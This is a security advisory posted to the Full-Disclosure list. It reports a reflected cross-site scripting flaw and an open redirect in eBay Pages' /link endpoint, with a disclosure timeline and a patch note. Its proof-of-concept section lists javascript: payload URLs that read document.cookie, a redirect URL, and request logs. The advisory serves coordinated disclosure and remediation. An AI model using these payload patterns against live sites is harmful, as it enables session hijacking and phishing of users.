lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Mon, 8 Feb 2016 12:08:18 +0100
From: Vulnerability Lab <research@...nerability-lab.com>
To: fulldisclosure@...lists.org
Subject: [FD] Ebay Inc (Pages) - Client Side Cross Site Scripting
	Vulnerabilities

Document Title:
===============
Ebay Inc (Pages) - Client Side Cross Site Scripting Vulnerabilities


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1626


Release Date:
=============
2016-02-07


Vulnerability Laboratory ID (VL-ID):
====================================
1626


Common Vulnerability Scoring System:
====================================
3.4


Product & Service Introduction:
===============================
eBay Inc. is an American multinational internet consumer-to-consumer corporation, headquartered in San Jose, California. It was founded by Pierre Omidyar in 1995, 
and became a notable success story of the dot-com bubble; it is now a multi-billion dollar business with operations localized in over thirty countries. The company 
manages eBay.com, an online auction and shopping website in which people and businesses buy and sell a broad variety of goods and services worldwide. In addition to 
its auction-style sellings, the website has since expanded to include `Buy It Now` standard shopping; shopping by UPC, ISBN, or other kind of SKU (via Half.com); 
online classified advertisements online event ticket trading online money transfers and other services.

(Copy of the Homepage: http://en.wikipedia.org/wiki/EBay )


Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered multiple client-side vulnerabilities in the official Ebay Inc Pages online service web-application.


Vulnerability Disclosure Timeline:
==================================
2015-10-27: Researcher Notification & Coordination (Daniel Diaz)
2015-10-27: Vendor Notification (Ebay Inc - Security Team)
2015-11-03: Vendor Response/Feedback (Ebay Inc - Security Team)
2016-02-06: Vendor Fix/Patch (Ebay Inc - Security Team)
2016-02-07: Vendor Fix/Patch (Ebay Inc - Developer Team) [Acknowledgements]
2016-02-07: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Ebay Inc.
Product: Ebay Pages - Online Service (Web-Application) 2015 Q4


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
Multiple client-side web vulnerabilities has been discovered in the official Ebay Pages online service web-application.
The first vulnerability allows remote attacker to inject client-side script codes to compromise browser to application requests.
The second vulnerability allows remote attacker to redirect client-side browser to application request for external manipulation.

The first vulnerability is a client-side cross site scripting vulnerability that is located in the nav value of the vulnerable link module.
The domain pages.ebay.com/link/ has two parameters `nav` and `url`. The `nav` parameter receives as argument `webview`. If an attacker sends 
a javascript code like `javascript:alert(document.cookie)` the code will execute in the same reply. The attack vector of the issue is non-
persistent and the request method to inject/execute is GET.

The second vulnerability is a client-side open redirect web vulnerability that is located in the url value of the vulnerable link module.
The `url` parameter receives as argument an url or javascript code. If an attacker sends an url like `http://www.google.es` the application 
will open the malicious webpage. The attack vector of the issue is non-persistent and the request method to redirect is GET.

The security risk of the client-side vulnerabilities is estimated as medium with a cvss (common vulnerability scoring system) count of 3.4. 
Exploitation of the security vulnerabilities requires no privilege web-application user account and low or medium user interaction. 
Successful exploitation of the vulnerabilities results in session hijacking, non-persistent phishing, non-persistent external redirects, 
non-persistent load of malicious script codes or non-persistent web module context manipulation.

Request Method(s):
                                [+] GET

Vulnerable Module(s):
                                [+] Ebay Pages > /link

Vulnerable Parameter(s):
                                [+] nav
                                [+] url

Affected Module(s):
                                [+] webview


Proof of Concept (PoC):
=======================
The vulnerabilities can be exploited by remote attackers without privileged web-application user account and with low or medium user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

PoC: Client Side Cross Site Scripting
http://pages.ebay.com/link/?nav=webview&url=javascript:alert(document.domain)
http://pages.ebay.com/link/?nav=webview&url=javascript:alert(document.cookie)
http://pages.ebay.com/link/?nav=webview&url=iframe:src=http://www.vulnerability-lab.com


PoC: Source
</head><body>
<div id="splash">
	<svg id="ebylogo" viewBox="0 0 324 130" xmlns:dc="http://purl.org/dc/elements/1.1/" 
xmlns:cc="http://creativecommons.org/ns#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" 
xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" version="1.1" xml:space="preserve">
		<metadata id="metadata8">
			<rdf:RDF>
				<cc:Work rdf:about="">
					<dc:format>image/svg+xml</dc:format>
					<dc:type rdf:resource="http://purl.org/dc/dcmitype/StillImage" />
				</cc:Work>
			</rdf:RDF>
		</metadata>
		<defs id="defs6"/>
		<g transform="matrix(1.25,0,0,-1.25,0,129.7875)" id="g10">
			<g transform="scale(0.1,0.1)" id="g12">
				<path d="m 136.129,557.801 c 0,0 9.266,165.039 195.519,165.094 185.571,0.046 185.571,-165.094 185.571,-165.094 
l -381.09,0 z M 334.844,809.07 C 11.0391,809.137 -1.54297,557.062 0.113281,491.625 c 0,0 -15.859381,-294.695 326.804719,-294.695 294.445,
0 308.941,184.91 308.941,184.91 l -135.468,-0.274 c 0,0 -26.383,-101.867 -172.914,-99.14 -188.375,3.508 -195.692,186.008 -195.692,186.008 l 521.871,
0 c 0,0 39.602,340.57 -318.812,340.636" id="path14" style="fill:#ee273b;fill-opacity:1;fill-rule:nonzero;stroke:none"/>
				<path d="m 986.215,284.918 c -205.61,-2.578 -202.266,218.074 -202.266,218.074 0,0 -7.496,
212.395 201.942,217.852 209.409,5.461 202.599,-222.383 202.599,-222.383 0,0 3.34,-210.945 -202.275,-213.543 z M 1016.12,809.07 C 853.312,
809.984 783.266,712.656 783.266,712.656 l 0,325.634 -130.524,0 2.207,-688.208 c 0,0 -0.785,-80.164 -5.719,-133.144 l 126.77,0 5.441,77.316 c 0,
0 59.133,-97.324 231.939,-97.324 172.83,0 309.28,106.422 312.92,303.797 3.63,197.378 -147.35,307.441 -310.18,308.343" 
id="path16" style="fill:#2d62b7;fill-opacity:1;fill-rule:nonzero;stroke:none"/>
				<path d="m 1588.25,280.16 c 0,0 -130.82,-0.156 -138.49,104.363 -8.18,111.543 201.26,104.836 201.26,104.836 l 
147.96,0.149 c 0,0 23.96,-212.422 -210.73,-209.348 z m 341.11,72.637 c 0.32,89.023 2.93,168.512 0,224.582 -3.43,65.012 2.73,221.918 -278.34,
233.516 0,0 -269.47,24.558 -297.45,-176.004 l 137.82,0 c 0,0 10.7,91.886 150.54,89.246 132.34,-2.5 156.45,-67.414 155.77,-147.235 0,0 
-113.43,-0.32 -151.28,-0.511 -68.22,-0.34 -306.95,-7.903 -329.23,-153.313 C 1290.68,250.18 1445,196.242 1565.74,196.93 c 120.75,0.679 189.64,
36.836 240.81,101.636 l 5.47,-80.488 120.07,0.688 c 0,0 -3.1,45.007 -2.73,134.031" id="path18" style="fill:#f9a50d;fill-opacity:1;fill-rule:nonzero;stroke:none"/>
<path d="m 1857.95,787.246 151.43,0 221.49,-441.605 221.95,441.605 136.9,0 L 2189.02,0 2042.6,0 l 115.96,218.766 
-300.61,568.48" id="path20" style="fill:#5fbf32;fill-opacity:1;fill-rule:nonzero;stroke:none"/>
</g>
</g>
</svg>
</div>
<img style="display:none" width="1" height="1" alt="" title="" src="http://rover.ebay.com/roverimp/0/0/9?imp=2046809"/>
</body>
</html>


--- PoC Session Logs [GET] ---
Status: 304[Not Modified]
GET http://pages.ebay.com/link/?nav=webview&url=javascript:alert(document.cookie) Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[-1] Mime Type[application/x-unknown-content-type]
   Request Header:
      Host[pages.ebay.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Cookie[npii=btguid/a8d2551b1500a62058347f34fbac003858109e95^cguid/a8d2551b1500a62058347f34fbac003758109e95^; ebay=%5Edv%3D562f6b10%5Esbf%3D1048576%5E; dp1=btzo/-3c59f1d210^idm/15630bc90^; ds2=ssts/1445948177836^]
      Connection[keep-alive]
      If-Modified-Since[Tue, 27 Oct 2015 11:59:06 GMT]
      If-None-Match[f4c21154051531986879f9ae221d1409]
   Response Header:
      Server[Apache-Coyote/1.1]
      Etag[f4c21154051531986879f9ae221d1409]
      Last-Modified[Tue, 27 Oct 2015 12:06:51 GMT]
      Date[Tue, 27 Oct 2015 12:16:33 GMT]



PoC: Open Redirect
http://pages.ebay.com/link/?nav=webview&url=http://www.vulnerability-lab.com


--- PoC Session Logs [GET] ---
Status: 200[OK]
GET http://pages.ebay.com/link/?nav=webview&url=http://www.vulnerability-lab.com 
Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[2076] Mime Type[text/html]
   Request Header:
      Host[pages.ebay.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Cookie[npii=btguid/a8d2551b1500a62058347f34fbac003858109ea3^cguid/a8d2551b1500a62058347f34fbac003758109ea3^; ebay=%5Edv%3D562f6b10%5Esbf%3D1048576%5E; dp1=btzo/-3c59f1d210^idm/15630bc90^; ds2=ssts/1445948177836^]
      Connection[keep-alive]
   Response Header:
      Server[Apache-Coyote/1.1]
      Etag[f4c21154051531986879f9ae221d1409]
      Last-Modified[Tue, 27 Oct 2015 11:39:23 GMT]
      Content-Encoding[gzip]
      Content-Type[text/html;charset=UTF-8]
      Content-Length[2076]
      Date[Tue, 27 Oct 2015 12:19:26 GMT]

13:19:25.049[588ms][total 723ms] Status: 200[OK]
GET http://www.vulnerability-lab.com/ 
Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[76652] Mime Type[text/html]
   Request Header:
      Host[www.vulnerability-lab.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://pages.ebay.com/link/?nav=webview&url=http://www.vulnerability-lab.com]
      Cookie[PHPSESSID=df69fc7036e1108f80ce131d57f8b610]
      Connection[keep-alive]
   Response Header:
      Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
      Pragma[no-cache]
      Content-Type[text/html]
      Expires[Thu, 19 Nov 1981 08:52:00 GMT]
      Server[Microsoft-IIS/8.5]
      X-Powered-By[ASP.NET]
      X-Powered-By-Plesk[PleskWin]
      Date[Tue, 27 Oct 2015 12:19:31 GMT]
      Content-Length[76652]

Reference(s):
http://pages.ebay.com/
http://pages.ebay.com/link/


Solution - Fix & Patch:
=======================
The open redirect vulnerability can be patched by a restriction of the vulnerable url parameter. Approve the context and validate the request urls to prevent malicious redirects.

The client-side cross site scripting web vulnerability can be patched by a secure parse and encode of the vulnerable nav value in the link module GET method request.
Restrict the input to the parameter value and disallow special chars to prevent client-side script code injection attacks.


Security Risk:
==============
The security risk of the client-side vulnerabilities in the official ebay online service pages


Credits & Authors:
==================
Daniel Díez Tainta - (@DaniLabs)


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
Contact:    admin@...nerability-lab.com 	- research@...nerability-lab.com 	       		- admin@...lution-sec.com
Section:    magazine.vulnerability-db.com	- vulnerability-lab.com/contact.php		       	- evolution-sec.com/contact
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
(admin@...nerability-lab.com or research@...nerability-lab.com) to get a permission.

				Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@...nerability-lab.com



_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ